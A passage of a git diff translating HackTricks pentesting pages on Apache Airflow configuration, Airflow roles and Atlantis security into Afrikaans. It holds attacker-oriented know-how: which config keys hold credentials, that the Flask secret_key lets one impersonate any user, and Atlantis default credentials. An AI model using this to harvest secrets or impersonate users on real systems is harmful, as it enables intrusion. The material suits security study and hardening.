opdraginjeksie uitvoer. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md index 5fd8e486b..3fd2d9461 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md 
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md 
@@ -1,115 +1,105 @@ -# Airflow Configuration +# Airflow Konfigurasie {{#include ../../banners/hacktricks-training.md}} -## Configuration File +## Konfigurasie LĂȘer -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** +**Apache Airflow** genereer 'n **konfigurasie lĂȘer** in al die airflow masjiene genaamd **`airflow.cfg`** in die huis van die airflow gebruiker. Hierdie konfigurasie lĂȘer bevat konfigurasie-inligting en **kan interessante en sensitiewe inligting bevat.** -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** +**Daar is twee maniere om toegang tot hierdie lĂȘer te verkry: Deur 'n paar airflow masjiene te kompromitteer, of deur toegang tot die webkonsol.** -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. +Let daarop dat die **waardes binne die konfigurasie lĂȘer** **nie diegene mag wees wat gebruik word nie**, aangesien jy dit kan oorskryf deur omgewingsveranderlikes soos `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` in te stel. -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. +As jy toegang het tot die **konfigurasie lĂȘer in die webbediener**, kan jy die **werklike lopende konfigurasie** op dieselfde bladsy waar die konfigurasie vertoon word, nagaan.\ +As jy **toegang het tot 'n paar masjiene binne die airflow omgewing**, kyk na die **omgewing**. 
-Some interesting values to check when reading the config file: +Sommige interessante waardes om na te kyk wanneer jy die konfigurasie lĂȘer lees: ### \[api] -- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - - `airflow.api.auth.backend.basic_auth`: For **basic authentication** - - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - - You can also **create you own authentication** method with python. 
-- **`google_key_path`:** Path to the **GCP service account key** +- **`access_control_allow_headers`**: Dit dui die **toegelate** **koppe** vir **CORS** aan +- **`access_control_allow_methods`**: Dit dui die **toegelate metodes** vir **CORS** aan +- **`access_control_allow_origins`**: Dit dui die **toegelate oorspronge** vir **CORS** aan +- **`auth_backend`**: [**Volgens die dokumentasie**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) kan 'n paar opsies in plek wees om te konfigureer wie toegang tot die API kan hĂȘ: +- `airflow.api.auth.backend.deny_all`: **Standaard kan niemand** toegang tot die API hĂȘ nie +- `airflow.api.auth.backend.default`: **Enigiemand kan** toegang hĂȘ sonder verifikasie +- `airflow.api.auth.backend.kerberos_auth`: Om **kerberos-verifikasie** te konfigureer +- `airflow.api.auth.backend.basic_auth`: Vir **basiese verifikasie** +- `airflow.composer.api.backend.composer_auth`: Gebruik komponiste se verifikasie (GCP) (van [**hier**](https://cloud.google.com/composer/docs/access-airflow-api)). +- `composer_auth_user_registration_role`: Dit dui die **rol** aan wat die **komponiste gebruiker** binne **airflow** sal kry (**Op** standaard). +- Jy kan ook jou eie **verifikasie** metode met python skep. +- **`google_key_path`:** Pad na die **GCP diensrekening sleutel** ### **\[atlas]** -- **`password`**: Atlas password -- **`username`**: Atlas username +- **`password`**: Atlas wagwoord +- **`username`**: Atlas gebruikersnaam ### \[celery] -- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -- **`result_backend`**: Postgres url which may contain **credentials**. -- **`ssl_cacert`**: Path to the cacert -- **`ssl_cert`**: Path to the cert -- **`ssl_key`**: Path to the key +- **`flower_basic_auth`** : Kredensiale (_user1:password1,user2:password2_) +- **`result_backend`**: Postgres url wat **kredensiale** kan bevat. 
+- **`ssl_cacert`**: Pad na die cacert +- **`ssl_cert`**: Pad na die sertifikaat +- **`ssl_key`**: Pad na die sleutel ### \[core] -- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -- **`fernet_key`**: Key to store encrypted variables (symmetric) -- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -- **`security`**: What security module to use (for example kerberos) +- **`dag_discovery_safe_mode`**: Geaktiveer deur standaard. Wanneer DAGs ontdek word, ignoreer enige lĂȘers wat nie die strings `DAG` en `airflow` bevat nie. +- **`fernet_key`**: Sleutel om versleutelde veranderlikes te stoor (simmetries) +- **`hide_sensitive_var_conn_fields`**: Geaktiveer deur standaard, verberg sensitiewe inligting van verbindings. +- **`security`**: Watter sekuriteitsmodule om te gebruik (byvoorbeeld kerberos) ### \[dask] -- **`tls_ca`**: Path to ca -- **`tls_cert`**: Part to the cert -- **`tls_key`**: Part to the tls key +- **`tls_ca`**: Pad na ca +- **`tls_cert`**: Pad na die sertifikaat +- **`tls_key`**: Pad na die tls sleutel ### \[kerberos] -- **`ccache`**: Path to ccache file -- **`forwardable`**: Enabled by default +- **`ccache`**: Pad na ccache lĂȘer +- **`forwardable`**: Geaktiveer deur standaard ### \[logging] -- **`google_key_path`**: Path to GCP JSON creds. +- **`google_key_path`**: Pad na GCP JSON kredensiale. ### \[secrets] -- **`backend`**: Full class name of secrets backend to enable -- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. +- **`backend`**: Volledige klasnaam van die secrets backend om te aktiveer +- **`backend_kwargs`**: Die backend_kwargs parameter word in 'n woordeboek gelaai en aan **init** van die secrets backend klas oorgedra. 
### \[smtp] -- **`smtp_password`**: SMTP password -- **`smtp_user`**: SMTP user +- **`smtp_password`**: SMTP wagwoord +- **`smtp_user`**: SMTP gebruiker ### \[webserver] -- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -- **`cookie_secure`**: Set **secure flag** on the the session cookie -- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible +- **`cookie_samesite`**: Standaard is dit **Lax**, so dit is reeds die swakste moontlike waarde +- **`cookie_secure`**: Stel **veilige vlag** op die sessie koekie +- **`expose_config`**: Standaard is dit Vals, as waar, kan die **konfigurasie** **gelees** word vanaf die web **konsol** +- **`expose_stacktrace`**: Standaard is dit Waar, dit sal **python tracebacks** vertoon (potensieel nuttig vir 'n aanvaller) +- **`secret_key`**: Dit is die **sleutel wat deur flask gebruik word om die koekies te teken** (as jy dit het, kan jy **enige gebruiker in Airflow naboots**) +- **`web_server_ssl_cert`**: **Pad** na die **SSL** **sertifikaat** +- **`web_server_ssl_key`**: **Pad** na die **SSL** **Sleutel** +- **`x_frame_enabled`**: Standaard is **Waar**, so klikjacking is nie moontlik nie -### Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as +### Web Verifikasie +Standaard word **web verifikasie** in die lĂȘer **`webserver_config.py`** gespesifiseer en is geconfigureer as ```bash AUTH_TYPE = AUTH_DB 
``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - +Wat beteken dat die **authentisering teen die databasis nagegaan word**. egter, ander konfigurasies is moontlik soos ```bash AUTH_TYPE = AUTH_OAUTH ``` +Om die **verifikasie aan derdeparty-dienste** oor te laat. -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - +Daar is egter ook 'n opsie om **anonieme gebruikers toegang** te gee, deur die volgende parameter op die **gewenste rol** in te stel: ```bash AUTH_ROLE_PUBLIC = 'Admin' ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 7ff782327..764af5a2f 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md 
@@ -4,44 +4,40 @@ ## RBAC -(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. +(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow verskaf 'n **stel rolle standaard**: **Admin**, **User**, **Op**, **Viewer**, en **Public**. **Slegs `Admin`** gebruikers kan **die toestemmings vir ander rolle konfigureer/wysig**. Maar dit word nie aanbeveel dat `Admin` gebruikers hierdie standaard rolle op enige manier verander deur toestemmings van hierdie rolle te verwyder of by te voeg nie. -- **`Admin`** users have all possible permissions. -- **`Public`** users (anonymous) don’t have any permissions. -- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -- **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** gebruikers het alle moontlike toestemmings. +- **`Public`** gebruikers (anoniem) het geen toestemmings nie. +- **`Viewer`** gebruikers het beperkte kyktoestemmings (slegs lees). Dit **kan nie die konfigurasie sien nie.** +- **`User`** gebruikers het `Viewer` toestemmings plus addisionele gebruikers toestemmings wat hom toelaat om DAGs 'n bietjie te bestuur. Hy **kan die konfigurasie lĂȘer sien.** +- **`Op`** gebruikers het `User` toestemmings plus addisionele operasionele toestemmings. -Note that **admin** users can **create more roles** with more **granular permissions**. 
+Let daarop dat **admin** gebruikers kan **meer rolle skep** met meer **fynere toestemmings**. -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. +Neem ook kennis dat die enigste standaard rol met **toestemming om gebruikers en rolle te lys is Admin, nie eens Op** sal dit kan doen nie. ### Default Permissions -These are the default permissions per default role: +Hierdie is die standaard toestemmings per standaard rol: - **Admin** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu 
access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] +\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op Roles, kan lees op Permissions, kan verwyder op Roles, kan wysig op Roles, kan skep op Roles, kan lees op Users, kan skep op Users, kan wysig op Users, kan verwyder op Users, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op 
Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs, kan lees op Task Reschedules, menu toegang op Task Reschedules, kan lees op Triggers, menu toegang op Triggers, kan lees op Passwords, kan wysig op Passwords, menu toegang op List Users, menu toegang op Security, menu toegang op List Roles, kan lees op User Stats Chart, menu toegang op User's Statistics, menu toegang op Base Permissions, kan lees op View Menus, menu toegang op Views/Menus, kan lees op Permission Views, menu toegang op Permission on Views/Menus, kan kry op MenuApi, menu toegang op Providers, kan skep op XComs] - **Op** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu 
access on Variables, menu access on XComs, can delete on XComs] +\[kan verwyder op Connections, kan lees op Connections, kan wysig op Connections, kan skep op Connections, kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan verwyder op Pools, kan lees op Pools, kan wysig op Pools, kan skep op Pools, kan lees op Providers, kan verwyder op Variables, kan lees op Variables, kan wysig op Variables, kan skep op Variables, kan lees op XComs, kan lees op DAG Code, kan lees op Configurations, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances, menu toegang op Admin, menu toegang op Configurations, menu toegang op Connections, menu toegang op Pools, menu toegang op Variables, menu toegang op XComs, kan verwyder op XComs] - **User** -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu 
access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] +\[kan lees op DAGs, kan wysig op DAGs, kan verwyder op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan wysig op Task Instances, kan verwyder op DAG Runs, kan skep op DAG Runs, kan wysig op DAG Runs, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances, kan skep op Task Instances, kan verwyder op Task Instances] - **Viewer** -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] +\[kan lees op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, 
kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances] - **Public** \[] {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md index a4b35140f..21e116f82 100644 --- a/src/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md 
@@ -4,109 +4,109 @@ ### Basic Information -Atlantis basically helps you to to run terraform from Pull Requests from your git server. +Atlantis help jou basies om terraform vanaf Pull Requests van jou git bediener te laat loop. ![](<../images/image (161).png>) ### Local Lab -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 +1. Gaan na die **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) en **aflaai** die een wat vir jou geskik is. +2. Skep 'n **persoonlike token** (met repo toegang) van jou **github** gebruiker. +3. Voer `./atlantis testdrive` uit en dit sal 'n **demo repo** skep wat jy kan gebruik om met **atlantis** te **praat**. +1. Jy kan die webblad in 127.0.0.1:4141 toegang. ### Atlantis Access #### Git Server Credentials -**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. 
+**Atlantis** ondersteun verskeie git gasheer soos **Github**, **Gitlab**, **Bitbucket** en **Azure DevOps**.\ +Echter, om toegang tot die repos in daardie platforms te verkry en aksies uit te voer, moet dit 'n paar **privileged access granted to them** hĂȘ (ten minste skryf regte).\ +[**Die docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) moedig aan om 'n gebruiker in hierdie platforms spesifiek vir Atlantis te skep, maar sommige mense mag persoonlike rekeninge gebruik. > [!WARNING] -> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. +> In enige geval, vanuit 'n aanvaller se perspektief, gaan die **Atlantis rekening** een baie **interessante** **te kompromitteer** wees. #### Webhooks -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. +Atlantis gebruik opsioneel [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) om te verifieer dat die **webhooks** wat dit van jou Git gasheer ontvang **legitiem** is. -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. +Een manier om dit te bevestig, sou wees om **toestemming te gee dat versoeke slegs van die IP's** van jou Git gasheer kom, maar 'n makliker manier is om 'n Webhook Secret te gebruik. -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. +Let daarop dat tensy jy 'n private github of bitbucket bediener gebruik, jy webhook eindpunte aan die internet moet blootstel. > [!WARNING] -> Atlantis is going to be **exposing webhooks** so the git server can send it information. 
From an attackers perspective it would be interesting to know **if you can send it messages**. +> Atlantis gaan **webhooks blootstel** sodat die git bediener dit inligting kan stuur. Vanuit 'n aanvaller se perspektief sou dit interessant wees om te weet **of jy dit boodskappe kan stuur**. #### Provider Credentials -[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) +[Van die docs:](https://www.runatlantis.io/docs/provider-credentials.html) -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. +Atlantis loop Terraform deur eenvoudig **`terraform plan` en `apply`** op die bediener **waarop Atlantis gehoste is** uit te voer. Net soos wanneer jy Terraform plaaslik loop, benodig Atlantis credentials vir jou spesifieke verskaffer. -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: +Dit is aan jou hoe jy [credentials verskaf](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) vir jou spesifieke verskaffer aan Atlantis: -- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. 
-- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. +- Die Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) en [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) het hul eie meganismes vir verskaffer credentials. Lees hul docs. +- As jy Atlantis in 'n wolk loop, het baie wolke maniere om wolk API toegang aan toepassings wat daarop loop te gee, bv: +- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Soek vir "EC2 Role") +- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- Baie gebruikers stel omgewing veranderlikes in, bv. `AWS_ACCESS_KEY`, waar Atlantis loop. +- Ander skep die nodige konfigurasie lĂȘers, bv. `~/.aws/credentials`, waar Atlantis loop. +- Gebruik die [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) om verskaffer credentials te verkry. > [!WARNING] -> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. +> Die **container** waar **Atlantis** **loop**, gaan hoogs waarskynlik **privileged credentials** vir die verskaffers (AWS, GCP, Github...) wat Atlantis via Terraform bestuur, bevat. #### Web Page -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). +Standaard sal Atlantis 'n **webblad in die poort 4141 in localhost** laat loop. 
Hierdie bladsy laat jou net toe om atlantis apply in te skakel/af te skakel en die planstatus van die repos te kontroleer en hulle te ontgrendel (dit laat nie toe om dinge te wysig nie, so dit is nie so nuttig nie). -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). +Jy sal waarskynlik nie vind dat dit aan die internet blootgestel is nie, maar dit lyk asof standaard **geen credentials benodig** word om toegang te verkry nie (en as hulle is, is `atlantis`:`atlantis` die **standaard** een). ### Server Configuration -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. +Konfigurasie vir `atlantis server` kan gespesifiseer word via opdraglyn vlae, omgewing veranderlikes, 'n konfigurasie lĂȘer of 'n mengsel van die drie. -- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- Jy kan [**hier die lys van vlae**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) wat deur Atlantis bediener ondersteun word, vind. +- Jy kan [**hier vind hoe om 'n konfigurasie opsie in 'n omgewing veranderlike te transformeer**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) -Values are **chosen in this order**: +Waardes word **in hierdie volgorde gekies**: -1. Flags -2. Environment Variables -3. Config File +1. Vlae +2. Omgewing Veranderlikes +3. Konfigurasie LĂȘer > [!WARNING] -> Note that in the configuration you might find interesting values such as **tokens and passwords**. 
+> Let daarop dat jy in die konfigurasie dalk interessante waardes soos **tokens en wagwoorde** mag vind. #### Repos Configuration -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: +Sommige konfigurasies beĂŻnvloed **hoe die repos bestuur word**. Dit is egter moontlik dat **elke repo verskillende instellings vereis**, so daar is maniere om elke repo te spesifiseer. Dit is die prioriteitsorde: -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. **Default** values +1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) lĂȘer. Hierdie lĂȘer kan gebruik word om te spesifiseer hoe atlantis die repo moet hanteer. Echter, standaard kan sommige sleutels nie hier gespesifiseer word nie sonder sommige vlae wat dit toelaat. +1. Waarskynlik vereis om toegelaat te word deur vlae soos `allowed_overrides` of `allow_custom_workflows`. +2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Jy kan dit met die vlag `--repo-config` deurgee en dit is 'n yaml wat nuwe instellings vir elke repo konfigureer (regexes ondersteun). +3. **Standaard** waardes. 
**PR Protections** -Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. +Atlantis laat toe om aan te dui of jy wil hĂȘ die **PR** moet **`goedgekeur`** word deur iemand anders (selfs al is dit nie in die tak beskerming ingestel nie) en/of **`mergeable`** wees (tak beskermings geslaag) **voor die uitvoering van apply**. Vanuit 'n sekuriteitsoogpunt is dit aanbeveel om albei opsies in te stel. -In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. +In die geval dat `allowed_overrides` waar is, kan hierdie instellings **oor geskryf word op elke projek deur die `/atlantis.yml` lĂȘer**. **Scripts** -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.** +Die repo konfigurasie kan **scripts spesifiseer** om [**voor**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) en 